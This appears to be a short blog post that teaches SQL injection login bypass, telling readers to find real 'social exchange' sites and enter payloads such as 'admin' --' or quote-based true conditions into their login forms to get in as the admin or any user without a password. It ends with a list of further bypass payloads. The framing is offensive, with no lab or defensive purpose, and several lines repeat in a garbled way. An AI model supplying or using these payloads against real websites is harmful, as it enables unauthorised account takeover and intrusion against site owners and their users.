Lets Begin Hacking:
Just Find A Social Exchange Site
Find Its Login Page
In Username And Password Field Enter ‘=’ ‘or’
Note: Its Better To Coppy Above Query(‘=’ ‘or’) From Here As It Contains Spaces.
The above query sets a true condition in Sql
Now if the site is Vulnerable you will be logged in to the first user in the database, Gennerally first user will be the Admin
Then I thought how to login to a specific User in the database:
Then I used Sql Ignore Query(--)
Then I thought how to login to a specific User in the database:
Then I used Sql Ignore Query(--)
What this query dids is that it ignores the things after(--) setting the condition to true let us look bellow example
I used the bellow query as Log In name and left the Password to be blank
admin' --
Note: Its Better To Copy Above Query(admin' -- ) From Here As It Contains Spaces.
I used the bellow query as Log In name and left the Password to be blank
admin' --
Note: Its Better To Copy Above Query(admin' -- ) From Here As It Contains Spaces.
So when the query passes the admin is taken as username and the password field is ignored setting the condition to be true,So that you can login to system with username admin without password
Note:You Can Replace Admin With Any Username That Is In The Database Of That Particular Website.
You can try different methords for extracting usernames Like Sql Injection
Other Bypass Queries- admin' --
- admin' #
- admin'/*
- ' or 1=1--
- ' or 1=1#
- ' or 1=1/*
- ') or '1'='1--
- ') or ('1'='1--
No comments:
Post a Comment